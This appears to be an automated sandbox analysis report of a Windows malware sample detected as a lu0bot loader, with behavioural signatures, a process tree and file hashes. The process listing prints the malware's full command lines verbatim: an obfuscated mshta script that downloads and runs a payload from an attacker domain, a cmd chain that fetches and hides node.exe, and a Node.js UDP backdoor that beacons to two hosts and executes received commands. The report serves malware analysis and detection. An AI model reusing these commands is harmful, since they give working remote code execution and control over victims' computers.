Analysis
-
max time kernel
152s -
max time network
152s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
18-08-2021 14:27
Static task
static1
Behavioral task
behavioral1
Sample
usfive_20210818-031956.exe
Resource
win7v20210408
General
-
Target
usfive_20210818-031956.exe
-
Size
2KB
-
MD5
4a6ac8d48c9793c0c852a6ac93ba2002
-
SHA1
cdc7a9cf8ee36099c823779ac2dd8ffe3a84d723
-
SHA256
0297bbb0f00b3f591894ebcf042f2c6b0ed52e6662def1a9dbca0f8d20133cee
-
SHA512
3aacced9817519ae31ed2bc4cf4063b2eb0a1c9e9addbcb9e08b3431f519ca0a8a6a8962e1039835a48e50cb52cd08d21cad642a66822c288d2b0a88541c361e
Malware Config
Signatures
-
suricata: ET MALWARE lu0bot Loader HTTP Request
suricata: ET MALWARE lu0bot Loader HTTP Request
-
suricata: ET MALWARE lu0bot Loader HTTP Response
suricata: ET MALWARE lu0bot Loader HTTP Response
-
Blocklisted process makes network request 2 IoCs
Processes:
mshta.execscript.exeflow pid process 5 1516 mshta.exe 6 1608 cscript.exe -
Executes dropped EXE 1 IoCs
Processes:
node.exepid process 2040 node.exe -
Loads dropped DLL 1 IoCs
Processes:
cscript.exepid process 1016 cscript.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Drops file in Windows directory 2 IoCs
Processes:
expand.exedescription ioc process File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
node.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exenetstat.exepid process 1708 ipconfig.exe 1852 netstat.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
NTFS ADS 2 IoCs
Processes:
node.exedescription ioc process File created C:\Users\Admin\AppData\Local\Temp\59191438af20338c:ads node.exe File created C:\ProgramData\DNTException\node.exe:4453c2ec17cbd545793a308b8805c2d5 node.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 5 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 6 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
node.exepid process 2040 node.exe 2040 node.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
Processes:
tasklist.exewmic.exenetstat.exedescription pid process Token: SeDebugPrivilege 1380 tasklist.exe Token: SeIncreaseQuotaPrivilege 1788 wmic.exe Token: SeSecurityPrivilege 1788 wmic.exe Token: SeTakeOwnershipPrivilege 1788 wmic.exe Token: SeLoadDriverPrivilege 1788 wmic.exe Token: SeSystemProfilePrivilege 1788 wmic.exe Token: SeSystemtimePrivilege 1788 wmic.exe Token: SeProfSingleProcessPrivilege 1788 wmic.exe Token: SeIncBasePriorityPrivilege 1788 wmic.exe Token: SeCreatePagefilePrivilege 1788 wmic.exe Token: SeBackupPrivilege 1788 wmic.exe Token: SeRestorePrivilege 1788 wmic.exe Token: SeShutdownPrivilege 1788 wmic.exe Token: SeDebugPrivilege 1788 wmic.exe Token: SeSystemEnvironmentPrivilege 1788 wmic.exe Token: SeRemoteShutdownPrivilege 1788 wmic.exe Token: SeUndockPrivilege 1788 wmic.exe Token: SeManageVolumePrivilege 1788 wmic.exe Token: 33 1788 wmic.exe Token: 34 1788 wmic.exe Token: 35 1788 wmic.exe Token: SeIncreaseQuotaPrivilege 1788 wmic.exe Token: SeSecurityPrivilege 1788 wmic.exe Token: SeTakeOwnershipPrivilege 1788 wmic.exe Token: SeLoadDriverPrivilege 1788 wmic.exe Token: SeSystemProfilePrivilege 1788 wmic.exe Token: SeSystemtimePrivilege 1788 wmic.exe Token: SeProfSingleProcessPrivilege 1788 wmic.exe Token: SeIncBasePriorityPrivilege 1788 wmic.exe Token: SeCreatePagefilePrivilege 1788 wmic.exe Token: SeBackupPrivilege 1788 wmic.exe Token: SeRestorePrivilege 1788 wmic.exe Token: SeShutdownPrivilege 1788 wmic.exe Token: SeDebugPrivilege 1788 wmic.exe Token: SeSystemEnvironmentPrivilege 1788 wmic.exe Token: SeRemoteShutdownPrivilege 1788 wmic.exe Token: SeUndockPrivilege 1788 wmic.exe Token: SeManageVolumePrivilege 1788 wmic.exe Token: 33 1788 wmic.exe Token: 34 1788 wmic.exe Token: 35 1788 wmic.exe Token: SeDebugPrivilege 1852 netstat.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
usfive_20210818-031956.exemshta.execmd.execscript.exenode.exedescription pid process target process PID 980 wrote to memory of 1516 980 usfive_20210818-031956.exe mshta.exe PID 980 wrote to memory of 1516 980 usfive_20210818-031956.exe mshta.exe PID 980 wrote to memory of 1516 980 usfive_20210818-031956.exe mshta.exe PID 980 wrote to memory of 1516 980 usfive_20210818-031956.exe mshta.exe PID 1516 wrote to memory of 1268 1516 mshta.exe cmd.exe PID 1516 wrote to memory of 1268 1516 mshta.exe cmd.exe PID 1516 wrote to memory of 1268 1516 mshta.exe cmd.exe PID 1516 wrote to memory of 1268 1516 mshta.exe cmd.exe PID 1268 wrote to memory of 1608 1268 cmd.exe cscript.exe PID 1268 wrote to memory of 1608 1268 cmd.exe cscript.exe PID 1268 wrote to memory of 1608 1268 cmd.exe cscript.exe PID 1268 wrote to memory of 1608 1268 cmd.exe cscript.exe PID 1268 wrote to memory of 752 1268 cmd.exe expand.exe PID 1268 wrote to memory of 752 1268 cmd.exe expand.exe PID 1268 wrote to memory of 752 1268 cmd.exe expand.exe PID 1268 wrote to memory of 752 1268 cmd.exe expand.exe PID 1268 wrote to memory of 1016 1268 cmd.exe cscript.exe PID 1268 wrote to memory of 1016 1268 cmd.exe cscript.exe PID 1268 wrote to memory of 1016 1268 cmd.exe cscript.exe PID 1268 wrote to memory of 1016 1268 cmd.exe cscript.exe PID 1016 wrote to memory of 2040 1016 cscript.exe node.exe PID 1016 wrote to memory of 2040 1016 cscript.exe node.exe PID 1016 wrote to memory of 2040 1016 cscript.exe node.exe PID 1016 wrote to memory of 2040 1016 cscript.exe node.exe PID 2040 wrote to memory of 604 2040 node.exe cmd.exe PID 2040 wrote to memory of 604 2040 node.exe cmd.exe PID 2040 wrote to memory of 604 2040 node.exe cmd.exe PID 2040 wrote to memory of 604 2040 node.exe cmd.exe PID 2040 wrote to memory of 1760 2040 node.exe cacls.exe PID 2040 wrote to memory of 1760 2040 node.exe cacls.exe PID 2040 wrote to memory of 1760 2040 node.exe cacls.exe PID 2040 wrote to memory of 1760 2040 node.exe cacls.exe PID 2040 wrote to memory of 1624 2040 node.exe icacls.exe PID 2040 wrote to memory of 1624 2040 node.exe icacls.exe PID 2040 wrote to memory of 1624 2040 node.exe icacls.exe PID 2040 wrote to memory of 1624 2040 node.exe icacls.exe PID 2040 wrote to memory of 1620 2040 node.exe attrib.exe PID 2040 wrote to memory of 1620 2040 node.exe attrib.exe PID 2040 wrote to memory of 1620 2040 node.exe attrib.exe PID 2040 wrote to memory of 1620 2040 node.exe attrib.exe PID 2040 wrote to memory of 1712 2040 node.exe attrib.exe PID 2040 wrote to memory of 1712 2040 node.exe attrib.exe PID 2040 wrote to memory of 1712 2040 node.exe attrib.exe PID 2040 wrote to memory of 1712 2040 node.exe attrib.exe PID 2040 wrote to memory of 1380 2040 node.exe tasklist.exe PID 2040 wrote to memory of 1380 2040 node.exe tasklist.exe PID 2040 wrote to memory of 1380 2040 node.exe tasklist.exe PID 2040 wrote to memory of 1380 2040 node.exe tasklist.exe PID 2040 wrote to memory of 1788 2040 node.exe wmic.exe PID 2040 wrote to memory of 1788 2040 node.exe wmic.exe PID 2040 wrote to memory of 1788 2040 node.exe wmic.exe PID 2040 wrote to memory of 1788 2040 node.exe wmic.exe PID 2040 wrote to memory of 1708 2040 node.exe ipconfig.exe PID 2040 wrote to memory of 1708 2040 node.exe ipconfig.exe PID 2040 wrote to memory of 1708 2040 node.exe ipconfig.exe PID 2040 wrote to memory of 1708 2040 node.exe ipconfig.exe PID 2040 wrote to memory of 1244 2040 node.exe route.exe PID 2040 wrote to memory of 1244 2040 node.exe route.exe PID 2040 wrote to memory of 1244 2040 node.exe route.exe PID 2040 wrote to memory of 1244 2040 node.exe route.exe PID 2040 wrote to memory of 1852 2040 node.exe netstat.exe PID 2040 wrote to memory of 1852 2040 node.exe netstat.exe PID 2040 wrote to memory of 1852 2040 node.exe netstat.exe PID 2040 wrote to memory of 1852 2040 node.exe netstat.exe -
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 1620 attrib.exe 1712 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\usfive_20210818-031956.exe"C:\Users\Admin\AppData\Local\Temp\usfive_20210818-031956.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Windows\SysWOW64\mshta.exemshta "javascript:document.write();27;y=unescape('%336%7Eh%74t%70%3A%2F%2F%61s%751%30%2E%66u%6E%2F%68r%69%2F%3F2%31a%36e%34b%7E1%333').split('~');204;try{x='WinHttp';251;x=new ActiveXObject(x+'.'+x+'Request.5.1');200;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);117;x.send();134;y='ipt.S';8;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);71;}catch(e){};165;;window.close();"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1629296878959.txt & cscript /nologo /e:jscript get1629296878959.txt "http%3A%2F%2Fasu10.fun%2Fhri%2F%3F2e7ed02db%26b%3D96e60733" node.cab & expand node.cab node.exe & del get1629296878959.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1629296878959.txt & cscript /nologo /e:jscript get1629296878959.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27e7ed02db%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu10.fun%27);s.send(b,0,b.length,19584,%27lu1.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1629296878959.txt3⤵
- Suspicious use of WriteProcessMemory
PID:1268 -
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1629296878959.txt "http%3A%2F%2Fasu10.fun%2Fhri%2F%3F2e7ed02db%26b%3D96e60733" node.cab4⤵
- Blocklisted process makes network request
PID:1608 -
C:\Windows\SysWOW64\expand.exeexpand node.cab node.exe4⤵
- Drops file in Windows directory
PID:752 -
C:\Windows\SysWOW64\cscript.execscript /nologo /e:jscript get1629296878959.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27e7ed02db%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu10.fun%27);s.send(b,0,b.length,19584,%27lu1.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\ProgramData\DNTException\node.exe"C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%27e7ed02db%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27asu10.fun%27);s.send(b,0,b.length,19584,%27lu1.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))5⤵
- Executes dropped EXE
- Checks processor information in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SysWOW64\cmd.execmd.exe /c dir C:\6⤵PID:604
-
C:\Windows\SysWOW64\cacls.execacls.exe C:\ProgramData\DNTException /t /e /c /g Everyone:F6⤵PID:1760
-
C:\Windows\SysWOW64\icacls.exeicacls.exe C:\ProgramData\DNTException /t /c /grant *S-1-1-0:(f)6⤵
- Modifies file permissions
PID:1624 -
C:\Windows\SysWOW64\attrib.exeattrib.exe +H C:\ProgramData\DNTException6⤵
- Views/modifies file attributes
PID:1620 -
C:\Windows\SysWOW64\attrib.exeattrib.exe +H C:\ProgramData\DNTException\node.exe6⤵
- Views/modifies file attributes
PID:1712 -
C:\Windows\SysWOW64\tasklist.exetasklist /fo csv /nh6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1380 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic process get processid,parentprocessid,name,executablepath /format:csv6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1788 -
C:\Windows\SysWOW64\ipconfig.exeipconfig.exe /all6⤵
- Gathers network information
PID:1708 -
C:\Windows\SysWOW64\route.exeroute.exe print6⤵PID:1244
-
C:\Windows\SysWOW64\netstat.exenetstat.exe -ano6⤵
- Gathers network information
- Suspicious use of AdjustPrivilegeToken
PID:1852 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo.exe /fo csv6⤵
- Gathers system information
PID:800
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
52ec5ebd8a447b5115ce83e703bcde51
SHA138ce97f87c6be668d07985558fc89c53e27770a3
SHA256ef1be6a77e480e683331052654d3db47a02fe4b7af3e35e67b9248e989307615
SHA5129af71d426564ef92ff6de1d89107161c138bbdd9dc08b5e380a0b94e7b2e91ec4d498a1d8f4514552a45bf14a8f9078dc295aa1cb86cfc063427ad218e9d5f32
-
MD5
e15f82747d0884d61a5bc4fb2db7d29d
SHA1aca478622586f17603fe56705fd319b75198b2b0
SHA256982675d0465497986b3ece89f08f81a4629d975617671153e0ca653f2589966f
SHA512d8c17e54cbefa72191c238f23d619a4637fd74c8c8b9975071bf5507c5a34259495cd20e516c7f7f0c215ec4f724b22de88b8a5ea43765c019eb067600cf661d
-
MD5
c7ed3d9304a29c8b472174bd910be071
SHA122b7d55b80acd434c13b0a2d8c59b45c10220a42
SHA256abbaffb1b56bd3c5db5aedf4bdc0794d82bedba43677d13cd1056cb5412b3441
SHA512c65c80564019ae54145a939f9ed463895c337f020cbd769647dc6baf8db5db283a5e151c2ae4f10681d23db161d791ce59c395d8ebba603a27a2a6be0368a1a2
-
MD5
11f0b4e17e686cdc46f85a6becede4a8
SHA12826f7ac33b43439ecddd08ad541a7f54a9eb7c0
SHA2566a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c
SHA51211a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f
-
MD5
11f0b4e17e686cdc46f85a6becede4a8
SHA12826f7ac33b43439ecddd08ad541a7f54a9eb7c0
SHA2566a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c
SHA51211a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f
-
MD5
11f0b4e17e686cdc46f85a6becede4a8
SHA12826f7ac33b43439ecddd08ad541a7f54a9eb7c0
SHA2566a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c
SHA51211a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f